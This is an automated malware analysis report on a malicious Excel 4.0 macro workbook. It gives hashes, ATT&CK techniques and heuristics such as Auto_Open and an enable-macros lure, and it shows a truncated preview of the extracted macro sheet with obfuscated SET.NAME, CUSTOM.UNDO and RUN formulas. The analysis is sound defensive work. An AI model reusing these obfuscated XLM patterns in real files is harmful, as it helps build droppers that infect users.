Office (OOXML) malware analysis — malicious · b17553745e016653

MALICIOUS

Office (OOXML)

64.1 KB Created: 2020-07-12 19:02:17 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2020-09-15

MD5: 93897aa2998c1991834aa52bf86c0ad5 SHA-1: b91d37f744db2606709ec999f8eeb97c7b4c0514 SHA-256: b17553745e016653cace2242fbf6be5d91642e9ec2424d43f97d47576b2fc046

210 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

The sample is an Excel file containing Excel 4.0 macros, indicated by critical heuristic firings for OOXML_XLM_MACROSHEET and OOXML_XLM_AUTOOPEN_DEFINEDNAME. The macros utilize dangerous functions such as RUN, REGISTER, RETURN, and HALT, which are known primitives for downloading and executing payloads. The presence of a 'Macro/content-enable lure' heuristic further suggests an intent to trick the user into enabling malicious content. The document body is truncated and unreadable, providing no direct clues to the lure.

Heuristics 6

Excel 4.0 macro sheet (1 sheet(s)) critical 2 related findings OOXML_XLM_MACROSHEET

Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
Excel 4.0 Auto_Open defined name critical OOXML_XLM_AUTOOPEN_DEFINEDNAME

Workbook defines _xlnm.Auto_Open or _xlnm.Auto_Close while containing an XLM macro sheet. This is the OOXML/XLSB auto-execution shape for Excel 4.0 macros.
Dangerous XLM formula APIs: RUN, RETURN, REGISTER, HALT critical OOXML_XLM_DANGEROUS_FN

Excel 4.0 macro sheet uses formula APIs that call directly into Win32 (=CALL/=EXEC/=REGISTER/=FORMULA). These are the primitives used to download payloads, write files, and start processes from an XLM macro without invoking VBA.
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Hidden worksheet (hidden) low OOXML_HIDDEN_SHEET

Excel workbook contains 27 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.openxmlformats.org/spreadsheetml/2006/main In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/excel/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2009/9/acIn document text (OOXML body / shared strings)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

xlm_sheet_00.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/sheet1.xml 42036 bytes

Filename	Kind	Source	Size
`xlm_sheet_00.xml`	xlm-macrosheet	OOXML XLM macro sheet: xl/macrosheets/sheet1.xml	42036 bytes
SHA-256: `947e53c09cdc707927914619e1f1509a592412fba2a0a62f3bdeee65c970b201`
Preview script First 1,000 lines of the extracted script <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac"><dimension ref="A65:IL59966"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultRowHeight="14.4" x14ac:dyDescent="0.3"/><sheetData><row r="65" spans="65:65" x14ac:dyDescent="0.3"><c r="BM65"><v>11819</v></c></row><row r="66" spans="65:65" x14ac:dyDescent="0.3"><c r="BM66"><v>21</v></c></row><row r="389" spans="243:243" x14ac:dyDescent="0.3"><c r="II389"><v>2</v></c></row><row r="508" spans="24:24" x14ac:dyDescent="0.3"><c r="X508"><v>3</v></c></row><row r="571" spans="28:28" x14ac:dyDescent="0.3"><c r="AB571" t="s"><v>37</v></c></row><row r="595" spans="184:184" x14ac:dyDescent="0.3"><c r="GB595" t="s"><v>47</v></c></row><row r="627" spans="8:8" x14ac:dyDescent="0.3"><c r="H627" t="s"><v>3</v></c></row><row r="1151" spans="159:159" x14ac:dyDescent="0.3"><c r="FC1151" t="s"><v>35</v></c></row><row r="1382" spans="12:12" x14ac:dyDescent="0.3"><c r="L1382" t="s"><v>7</v></c></row><row r="2113" spans="73:73" x14ac:dyDescent="0.3"><c r="BU2113" t="s"><v>37</v></c></row><row r="2255" spans="161:161" x14ac:dyDescent="0.3"><c r="FE2255" t="s"><v>9</v></c></row><row r="2667" spans="146:146" x14ac:dyDescent="0.3"><c r="EP2667" t="s"><v>25</v></c></row><row r="2724" spans="144:144" x14ac:dyDescent="0.3"><c r="EN2724" t="s"><v>24</v></c></row><row r="2934" spans="234:234" x14ac:dyDescent="0.3"><c r="HZ2934" t="s"><v>18</v></c></row><row r="3305" spans="59:59" x14ac:dyDescent="0.3"><c r="BG3305" t="b"><f>SET.NAME("SjVZynkewtRm",$BJ$20849&$IC$25933&$DT$42754&$GJ$17549&$FE$30102&$FP$5113)</f><v>0</v></c></row><row r="3306" spans="59:59" x14ac:dyDescent="0.3"><c r="BG3306" t="b"><f>SET.NAME("LRNZcqMOXhbFVn",$FQ$28698)</f><v>0</v></c></row><row r="3307" spans="59:59" x14ac:dyDescent="0.3"><c r="BG3307" t="b"><f>CUSTOM.UNDO(gzt(),"JhwpZIKe")</f><v>0</v></c></row><row r="3308" spans="59:59" x14ac:dyDescent="0.3"><c r="BG3308" t="b"><f>RUN($CO$30587)</f><v>0</v></c></row><row r="3398" spans="166:166" x14ac:dyDescent="0.3"><c r="FJ3398" t="s"><v>39</v></c></row><row r="4357" spans="156:156" x14ac:dyDescent="0.3"><c r="EZ4357" t="s"><v>3</v></c></row><row r="4450" spans="187:187" x14ac:dyDescent="0.3"><c r="GE4450" t="s"><v>31</v></c></row><row r="4699" spans="135:135" x14ac:dyDescent="0.3"><c r="EE4699" t="s"><v>1</v></c></row><row r="4893" spans="134:134" x14ac:dyDescent="0.3"><c r="ED4893" t="b"><f>SET.NAME("SjVZynkewtRm",$AX$35063&$HA$21922&$HZ$2934&$BV$20540&$BP$28933&$EX$56938&$EN$55439&$II$389)</f><v>0</v></c></row><row r="4894" spans="134:134" x14ac:dyDescent="0.3"><c r="ED4894" t="b"><f>SET.NAME("LRNZcqMOXhbFVn",$DQ$22550)</f><v>0</v></c></row><row r="4895" spans="134:134" x14ac:dyDescent="0.3"><c r="ED4895" t="b"><f>CUSTOM.UNDO(gzt(),"MrzByEb")</f><v>0</v></c></row><row r="4896" spans="134:134" x14ac:dyDescent="0.3"><c r="ED4896" t="b"><f>RUN($FX$10287)</f><v>0</v></c></row><row r="5007" spans="116:116" x14ac:dyDescent="0.3"><c r="DL5007" t="b"><f>SET.NAME("SjVZynkewtRm",$GR$46256&$CT$48306&$CB$51726&$CL$49219&$GU$55804&$B$53410&$CK$12326&$EU$15930&$HW$33631&$EH$18261)</f><v>0</v></c></row><row r="5008" spans="116:116" x14ac:dyDescent="0.3"><c r="DL5008" t="b"><f>SET.NAME("LRNZcqMOXhbFVn",$CE$3709)</f><v>0</v></c></row><row r="5009" spans="116:116" x14ac:dyDescent="0.3"><c r="DL5009" t="b"><f>CUSTOM.UNDO(gzt(),"axsWYFZe")</f><v>0</v></c></row><row r="5010" spans="116:116" x14ac:dyDescent="0.3"><c r="DL5010" t="b"><f>RUN($GF$26025)</f><v>0</v></c></row><row r="5037" spans="245:245" x14ac:dyDescent="0.3"><c r="IK5037" t="s"><v>26</v></c></row><row r="5113" spans="172:172" ... (truncated)

SHA-256: 947e53c09cdc707927914619e1f1509a592412fba2a0a62f3bdeee65c970b201

Preview script

First 1,000 lines of the extracted script

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac"><dimension ref="A65:IL59966"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultRowHeight="14.4" x14ac:dyDescent="0.3"/><sheetData><row r="65" spans="65:65" x14ac:dyDescent="0.3"><c r="BM65"><v>11819</v></c></row><row r="66" spans="65:65" x14ac:dyDescent="0.3"><c r="BM66"><v>21</v></c></row><row r="389" spans="243:243" x14ac:dyDescent="0.3"><c r="II389"><v>2</v></c></row><row r="508" spans="24:24" x14ac:dyDescent="0.3"><c r="X508"><v>3</v></c></row><row r="571" spans="28:28" x14ac:dyDescent="0.3"><c r="AB571" t="s"><v>37</v></c></row><row r="595" spans="184:184" x14ac:dyDescent="0.3"><c r="GB595" t="s"><v>47</v></c></row><row r="627" spans="8:8" x14ac:dyDescent="0.3"><c r="H627" t="s"><v>3</v></c></row><row r="1151" spans="159:159" x14ac:dyDescent="0.3"><c r="FC1151" t="s"><v>35</v></c></row><row r="1382" spans="12:12" x14ac:dyDescent="0.3"><c r="L1382" t="s"><v>7</v></c></row><row r="2113" spans="73:73" x14ac:dyDescent="0.3"><c r="BU2113" t="s"><v>37</v></c></row><row r="2255" spans="161:161" x14ac:dyDescent="0.3"><c r="FE2255" t="s"><v>9</v></c></row><row r="2667" spans="146:146" x14ac:dyDescent="0.3"><c r="EP2667" t="s"><v>25</v></c></row><row r="2724" spans="144:144" x14ac:dyDescent="0.3"><c r="EN2724" t="s"><v>24</v></c></row><row r="2934" spans="234:234" x14ac:dyDescent="0.3"><c r="HZ2934" t="s"><v>18</v></c></row><row r="3305" spans="59:59" x14ac:dyDescent="0.3"><c r="BG3305" t="b"><f>SET.NAME("SjVZynkewtRm",$BJ$20849&amp;$IC$25933&amp;$DT$42754&amp;$GJ$17549&amp;$FE$30102&amp;$FP$5113)</f><v>0</v></c></row><row r="3306" spans="59:59" x14ac:dyDescent="0.3"><c r="BG3306" t="b"><f>SET.NAME("LRNZcqMOXhbFVn",$FQ$28698)</f><v>0</v></c></row><row r="3307" spans="59:59" x14ac:dyDescent="0.3"><c r="BG3307" t="b"><f>CUSTOM.UNDO(gzt(),"JhwpZIKe")</f><v>0</v></c></row><row r="3308" spans="59:59" x14ac:dyDescent="0.3"><c r="BG3308" t="b"><f>RUN($CO$30587)</f><v>0</v></c></row><row r="3398" spans="166:166" x14ac:dyDescent="0.3"><c r="FJ3398" t="s"><v>39</v></c></row><row r="4357" spans="156:156" x14ac:dyDescent="0.3"><c r="EZ4357" t="s"><v>3</v></c></row><row r="4450" spans="187:187" x14ac:dyDescent="0.3"><c r="GE4450" t="s"><v>31</v></c></row><row r="4699" spans="135:135" x14ac:dyDescent="0.3"><c r="EE4699" t="s"><v>1</v></c></row><row r="4893" spans="134:134" x14ac:dyDescent="0.3"><c r="ED4893" t="b"><f>SET.NAME("SjVZynkewtRm",$AX$35063&amp;$HA$21922&amp;$HZ$2934&amp;$BV$20540&amp;$BP$28933&amp;$EX$56938&amp;$EN$55439&amp;$II$389)</f><v>0</v></c></row><row r="4894" spans="134:134" x14ac:dyDescent="0.3"><c r="ED4894" t="b"><f>SET.NAME("LRNZcqMOXhbFVn",$DQ$22550)</f><v>0</v></c></row><row r="4895" spans="134:134" x14ac:dyDescent="0.3"><c r="ED4895" t="b"><f>CUSTOM.UNDO(gzt(),"MrzByEb")</f><v>0</v></c></row><row r="4896" spans="134:134" x14ac:dyDescent="0.3"><c r="ED4896" t="b"><f>RUN($FX$10287)</f><v>0</v></c></row><row r="5007" spans="116:116" x14ac:dyDescent="0.3"><c r="DL5007" t="b"><f>SET.NAME("SjVZynkewtRm",$GR$46256&amp;$CT$48306&amp;$CB$51726&amp;$CL$49219&amp;$GU$55804&amp;$B$53410&amp;$CK$12326&amp;$EU$15930&amp;$HW$33631&amp;$EH$18261)</f><v>0</v></c></row><row r="5008" spans="116:116" x14ac:dyDescent="0.3"><c r="DL5008" t="b"><f>SET.NAME("LRNZcqMOXhbFVn",$CE$3709)</f><v>0</v></c></row><row r="5009" spans="116:116" x14ac:dyDescent="0.3"><c r="DL5009" t="b"><f>CUSTOM.UNDO(gzt(),"axsWYFZe")</f><v>0</v></c></row><row r="5010" spans="116:116" x14ac:dyDescent="0.3"><c r="DL5010" t="b"><f>RUN($GF$26025)</f><v>0</v></c></row><row r="5037" spans="245:245" x14ac:dyDescent="0.3"><c r="IK5037" t="s"><v>26</v></c></row><row r="5113" spans="172:172"
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.